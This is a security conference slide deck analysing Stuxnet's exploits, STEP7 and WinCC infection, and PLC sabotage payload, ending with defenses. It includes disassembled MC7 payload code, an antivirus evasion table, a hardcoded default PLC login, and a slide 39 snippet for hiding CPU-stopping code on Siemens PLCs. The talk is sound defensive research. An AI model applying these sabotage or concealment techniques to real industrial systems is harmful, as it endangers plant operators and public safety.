The talk will show you the techical details of Stuxnet in their full glory and make you appreciate this work of engineering more. Based on a code-level analysis of the Stuxnet PLC payload, the presentation will explain techniques therein that can be used for industrial espionage and sabotage by copycat attackers against competitor's production facilities. Currently recommended defenses, their shortcomings and alternative approaches will also be discussed.
Bio: Felix 'FX' Lindner is founder and technical lead of the Recurity Labs GmbH consulting and research team. He is also the leader of the Phenoelit group and loves to hack pretty much everything with a CPU and some communication, preferably networked. He looks back at 15+ years of (legal) hacking with only a couple Cisco IOS and SAP remote exploits, tools for hacking HP printers and protocol attacks lining the road.
2. About
Founder and technical lead of
Recurity Labs GmbH
Over 20 years within the computer
industry
Specialized in attack methodologies and
techniques
Published first exploits against Cisco IOS
and RIM BlackBerry
Reverse Engineer by heart
3. Agenda
Goals of attacks on ICS
Standard attack patterns
Technical review of Stuxnet
Stuxnet prerequisites
Reusable techniques and patterns
Current defense strategies
Alternative defense strategies
4. Goals of ICS Attacks
ICS attacks that where documented:
Demonstration purposes
Power grid
Chemical industry
Rail Road management
Detonating a Trans-Siberian natural gas
pipeline (disputed)
Delaying a Uranium enrichment program
suspected to be used for nuclear weapons
6. Goals of ICS Attacks
Commonly suspected goals in the future:
Harming the competition
Delaying production of competing vendor
Primarily aimed at Just-in-Time suppliers
Blackmailing ICS owners
Similar to documented cases of network blackmail,
e.g. City of San Francisco vs. Terry Childs
Industrial espionage
Extraction of ICS programming in order to reverse
engineer recipes and algorithms
7. Challenges of ICS Security
Topic Office IT Control Systems
Availability Planned downtimes 24 x 7 x 365 x forever
Anti-Virus Widely used Uncommon / impossible
Lifetime 3-5 years Up to 20 years
Outsourcing Common Becomes common
Software patching Regular, scheduled Slow, vendor specific
Change management Common Rare
Real-time performance Best effort Critical (safety, process)
Security awareness Good Poor (only physical)
Security testing + audits Regular, scheduled None
Physical security Difficult Good if local
Hard if remote
Time / Log correlation Common Often ignored
10. Internal Attack Patterns
Direct manipulation through means of
subverted / bribed / disgruntled employees
Removal of control system source codes from
site
Configuration of various access restrictions using
passwords not communicated
Compromise of upstream management
systems
Preferred method for people without ICS
knowledge
SAP Plant Management and similar homegrown
tools with no or very little access controls
11. External Attack Patterns
Pre-compromise of production
components
Logic bombs or intentional vulnerabilities in
components acquired by the victim
Recommending or providing software with
“side effects” to suppliers
Especially well-suited for expensive software
components
Method occasionally used within the network
community
13. External Attack Patterns (cont.)
1. Compromise workstation computer in
office network of target
2. Compromise server with control systems
connection within target office network
3. Establish Man-in-the-Middle point of
control between operator and ICS
network
4. Modify control system
15. Evolvement of Standard Patterns
Most ICS environments used to be equipment
vendor specific
In some industries, the production process is
completely dependent on the vendors
Solutions are homogeneous inside heterogeneous
outside of a particular process
The landscape changes rapidly
Component based procurement standardizes the
production equipment
Semi-standardized protocols are used to improve
interoperability
Wireless protocols get introduced to improve flexibility
17. Features of Stuxnet
Multiple spreading mechanisms:
CVE-2010-2568 Windows LNK Vulnerability local code
execution
CVE-2010-3888 Windows Task Scheduler local privilege
escalation
CVE-2010-2743 Windows Keyboard Layout local privilege
escalation
CVE-2010-2729 Windows Print Spooler Service remote code
execution
CVE-2008-4250 Windows Server Service RPC handling remote
code execution
Self-copying to remote network shares
Self-copying to remote Siemens WinCC servers
Infection of Siemens STEP7 project files for automatic launch
upon load
18. Features of Stuxnet (2)
Peer-to-peer updating mechanism in LANs
Contacting two predefined C&C (command and
control) servers
Windows rootkit driver covering all Windows
versions since 2000
Driver file is signed with valid Code Signing certificate
Circumvention and corruption of 10 different client
security products
Special treatment for 3 additional ones
DLL loading routine that fools behavior based
HIDS detection mechanisms
19. Features of Stuxnet (3)
Fingerprinting an industrial control process
through documented and undocumented
data structures in programmable logic
controllers (PLCs)
Backdoors all instances of Siemens WinCC
and STEP7 through patching it’s
communication DLL in order to hide its
presence on the PLC
Virtualizes the PLC on the PLC itself, in order
to modify input and output controls without
the legitimate code on the PLC knowing
20. CVE-2010-2568: LNK
Uses a special feature of .LNK files
Explorer needs the icon of the target of the LNK
file in order to render it
LNK uses “dynamic icons” when pointing to a
control panel entry
Dynamic icons use an alternative handling where
Explorer.exe will call the LoadLibrary API on the
destination
LoadLibrary causes the DLL’s DllMain function to
be executed during load
100% reliable code execution within the context
of the user’s Explorer.exe
21. CVE-2010-3888: Task Scheduler
Uses CRC32 compensation attack to exploit design flaw in
Task Scheduler
When creating a scheduled task, the scheduler creates an
XML file for it
The XML file contains the user the task is executed under
The XML file is writable to the user creating the task
Scheduler runs a CRC32 on it and stores the checksum in the
registry
When the execution time arrives, the CRC32 is validated against
the file
Stuxnet modifies the user context of the scheduled task and
performs a CRC32 compensation
100% reliable code execution as LocalSystem on Windows
Vista and above
22. CVE-2010-2743: Keyboard Layout
Windows XP and lower allows keyboard layouts to
be loaded from anywhere
A (not validated) index is loaded from the layout
file in Kernel mode and used as an index to a
function pointer table with 3 entries
Exploit scans the memory past the function pointer
table for DWORDs that are suitable memory
addresses in userland
When one is found (<0x80000000), allocates memory
there and triggers the vulnerability
100% reliable code execution as Kernel on
Windows XP and below
23. CVE-2010-2729: Print Spooler
Enumerates printer spool shares on the network,
connects as Guest account
Print job requests to print an EXE and MOF file,
requesting to print to file in %SYSTEM32%
When printing for Guest, spooler does not
impersonate the remote user but runs as System, so
writing to %SYSTEM32% is allowed
MOF files are compiled scripts that are placed below
%SYSTEM32%
Windows monitors the creation and executes the MOF
file’s instructions, running the EXE file
100% reliable remote code execution as System
24. CVE-2008-4250: Server Service
Known vulnerability, found being exploited in the wild
by W32/Gimmiv.A
Interesting to note: Gimmiv.A reports installed security
products back to the C&C server
Exploits a vulnerability in the RPC path
canonicalization within the remote service
Patched since 2008 (MS08-067)
Actually turns out to be a sister vulnerability to MS06-040
Gains code execution as System
Widely used exploit in the Metasploit Framework,
including a large number of target Windows versions
and circumvention of DEP on Windows XP and 2003
Fair chance remote code execution as System
25. Special DLL Loading
Host IDS behavior monitoring usually
looks at LoadLibrary API calls
Stuxnet hooks file handling routines in
NTDLL.DLL in order redirect them into
memory areas when special filenames are
encountered
When Stuxnet uses LoadLibrary, the
special filenames are invalid on the file
system, so HIDS will ignore the call
26. Corrupting the Watchers
Security Software Infected Process
KAV v1 to v7 LSASS.EXE
KAV v8 to v9 KAV Process
McAfee Winlogon.exe
AntiVir LSASS.EXE
BitDefender LSASS.EXE
ETrust v5 to v6 (fail)
ETrust (Other) LSASS.EXE
F-Secure LSASS.EXE
Symantec LSASS.EXE
ESET NOD32 LSASS.EXE
Trend PC Cillin Trend Process
27. Siemens STEP7 Project Infection
Stuxnet patches the STEP7 project file handling
routines to modify any project opened in the
development or management IDE
Ignores projects older than 3.5 years
Ignores projects that appear to be examples
A specific DLL is placed in the directory “hOmSave7”
of the STEP7 project
STEP7 specific data in “Apilogtypes” is modified that
causes the DLL from “hOmSave7” to be loaded when
the project file is opened
The DLL is searched for in %SYSTEM32% and the STEP7
directories first, but when not found is loaded afterwards
from the project’s directory
28. Siemens STEP7 Project Infection (2)
Similar to STEP7 project infections, Stuxnet
also infects MCP files, used by Siemens
WinCC
WinCC databases are accessed through a
hardcoded username/password combination for
an administrative user that cannot be changed
Stuxnet uses remote SQL commands to transfer
itself to the server and execute there
Project files (even locally) are infected with
itself and a cabinet file in “GracScc_tlg7.sav”
Such projects, if loaded into a WinCC server
manually, may execute Stuxnet as well
29. Siemens PLC Infection
On Windows PCs with Siemens PLC software, the
DLL “s7otbxdx.dll” is replaced by a wrapper
The original version is kept for functionality
The wrapper ensures that:
When writing to the PLC, the Stuxnet PLC payload is
added in transit
When reading from the PLC, the Stuxnet PLC
payload is removed and hence hidden from view
An additional thread runs, monitoring the PLC and
verifying target properties
A second additional thread controls a Data Block on
the PLC, remotely managing its behavior
30. Siemens PLC Infection (2)
Before infecting any PLC, the injected code
on the Windows PC verifies properties
PLC CPU type 6ES7-417 or 6ES7-315-2
CP 342-5 Profibus interface module is present
At least 33 devices with Profibus identification
number 0x7050 or 0x9500 are present
Identification numbers are assigned globally unique by
vendors and Profinet International, comparable to IANA
The devices are Variable Frequency Drives (VFDs)
from Fararo Paya (Iran), and Vacon (Finland)
31. Stuxnet MC7 Payload
Three payloads are delivered with Stuxnet
Two almost identical payloads for 315-2 CPUs
Called Block A and B by Symantec
One larger payload for 417 CPUs
Called Block C by Symantec
Replacement of DP_RECV
DP_RECV is responsible for the processing of received Profibus
messages on the PLC
Original Function Code is moved and a malicious replacement is
embedded
Organizational Block (OB) 1 (cyclic execution) is patched with
call to Stuxnet MC7 payload
OB35 (timed execution) is patched with call to Stuxnet MC7
payload (watchdog function)
33. Stuxnet MC7 Payload (2)
Block A/B implement a state machine
1. Record frames via DP_RECV and monitor values of the
VFD, until enough events are recorded
2. Wait 2 hours
3. Send bursts of Profibus frames to the VFDs (Phase I)
145 or 127 frames (Vacon VFDs)
34 or 32 frames (Fararo Paya VFDs)
4. Send bursts (Phase II)
2 or 36 frames (Vacon VFDs)
23 or 27 (Fararo Paya VFDs)
5. Reset internal values and reinitialize internal structures
State 0 is the global error handler.
34. Stuxnet MC7 Payload Code
ADD_AC: // CODE XREF: S7_LV+94p
OPN DB888
L DBW10h // word 888.16
L W#16#3 // word 3
<I // ACCU2 is less than ACCU1
// 3 > 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 < 3)
// (do not jump if DW888.16 is 3 or more)
TAK // exchange ACCU1 and ACCU2
L W#16#4 // ACCU1 = 4
>I // ACCU2 is greater than ACCU1
// 4 < 888.16
JC loc_2840 // jump if RLO=1 (DW888.16 > 4 )
// (do not jump if DW888.16 is 4 or less)
L DW#16#0DEADF007h
PUSH // copy ACCU1 into ACCU2
BE
loc_2840: // CODE XREF: ADD_AC+Ej
// ADD_AC+1Aj
L DW#16#0
PUSH // copy ACCU1 into ACCU2
BE
35. Timing of the MC7 Payload
Recording takes place for 13 days
Wait 2 hours (fixed)
Pause after first burst is 27 days
Pause after second burst is 27 days
67 days for one cycle of attack
Wearing out was the goal, not destruction
The product of the attacked process was the
target, not the production equipment
36. PLC Virtualization / Decoupling
PLCs, including Siemens S7, execute in cycles
Read all input signals and set input table
Execute OB1
Write all output Bits to output table and generate signals
Stuxnet disables the automatic update of the Process
Image Input and Output Table
Essentially decoupling the entire PLC from its sensor
array, virtualizing it
Allows the Stuxnet payload to modify input and output Bits
(corresponding to signals) so the original code doesn’t
notice any changes
No explicit operator spoofing required! This method
may even fool people manually debugging the PLC.
37. PLC Input / Output Decoupling
L LW0
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Ah // Update Process Image Input Table
JU loc_24
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_24:
BLD +8
BLD +7
= L 14h.0
L B#16#0
T LB15h
UC SFC1Bh // Update Process Image Ouput Table
JU loc_46
(arg) P# L 15h.0
(arg) P# L 0.0
(arg) P# L 0.0
loc_46:
BLD +8
T LW0
38. BLD: A Trick Not Used
STEP7 engineers frequently use a simple trick to hide code
The BLD instruction is used as a marker around blocks of
code
The instruction has no effect on the PLC, but is interpreted by
the Siemens editors. Known combinations are:
BLD 1 / 2 (FC with parameters)
BLD 3 / 4 (FB with parameters)
BLD 7 / 8
BLD 14 / 15 (FC without parameters)
BLD 103 / 104
BLD 130 / 131 / 132 / 133 / 255
The STUXNET code does not make use of this trick
It actually keeps the original BLD instructions, wasting space
and simplifying analysis using Siemens tools
39. BLD Hiding
BLD +7
A "Always ON" // When being nasty, use this snippet
JC Run
UC SFC 46 // Stops the CPU
Run: NOP 0
... your code
... CC or UC of your FC's
BLD +8
Call SFC46
41. How Much Was Required?
Attack Capability Required for Targeted Attack?
CVE-2010-2568 LNK No
CVE-2010-3888 Task Scheduler No
CVE-2010-2743 Keyboard Layout No
CVE-2010-2729 Print Spooler No
CVE-2008-4250 Server Service RPC No
Self-copying to network share No
Peer-to-peer updating No
C&C Servers No
Windows rootkit & certificates No
10 AV product circumventions No
Behavioral detection evasion No
42. How Much Was Required?
Attack Capability Required for Targeted Attack?
Self-copying to WinCC Optional
STEP7 project file infection Yes
ICS process fingerprinting Yes
STEP7 DLL Backdoor Optional
PLC Virtualization Yes
43. Relevant Techniques
Most of Stuxnet’s functionality is spreading,
survival and persistence oriented
The measures taken are extreme
Targeted attacks on an industrial process only
need a few key technologies
If the infection can be accomplished by human
means, only the PLC payload stays relevant
Stuxnet demonstrates how it is done
There is still significant room for advancements,
considering the complexity of Siemens S7
Similar attacks are very likely to be possible with any
other PLC vendor’s equipment
44. Only In Siemens-Land
Dillon Beresford showed another way at
BlackHat USA 2011:
Username: basisk
Password: basisk
Compromised OS
below the MC7 layer
is obviously a game
over scenario for any
security within the
PLC network.
46. Current Defenses
Siemens still postulates it’s the customer’s job to secure its
automation process
Code execution upon STEP7 project loading not considered a
vulnerability. No fix.
Code execution through fixed passwords on WinCC servers not
fixed. The password is publicly known since 2008.
At least the fixed username and password in PLC OS is
supposedly removed since 2009
Air gaps? Don’t help, don’t exist.
Infected consultants and service engineers
Process performance dashboards for management
Agile production environments in supplier fabs
Virus scanners?
Have not protected anything since 1970.
47. Future Defenses
Frequent reprogramming of the entire automation
environment
Proposed by process engineers
May actually be the best option today
Langner Controller Integrity Checker (CIC)
Developed as response to Stuxnet
Promising first attempt on solving some of the problems
Evasion obviously possible, as it suffers from the detection
paradigm (AV software) problem
Siemens specific, doesn’t help with other automation
environments
Both don’t help when the underlying OS is infected
48. Future Defenses
Future defenses can only get developed with a better
understanding of the offense
Stuxnet targets a very specific environment
Currently flourishing research is completely utility centric
(power, water, waste, railway)
Industrial Control Systems are extremely environment
specific by nature
The best protection is to evaluate your own
environment’s vulnerability
Based on a solid threat model, developed around your
business and your likely adversaries
The only approach that has been shown to work in other
emerging threat areas before
49. Thank You!
Felix ´FX´ Lindner
Head
fx@recurity-labs.com
Recurity Labs GmbH, Berlin, Germany
http://www.recurity-labs.com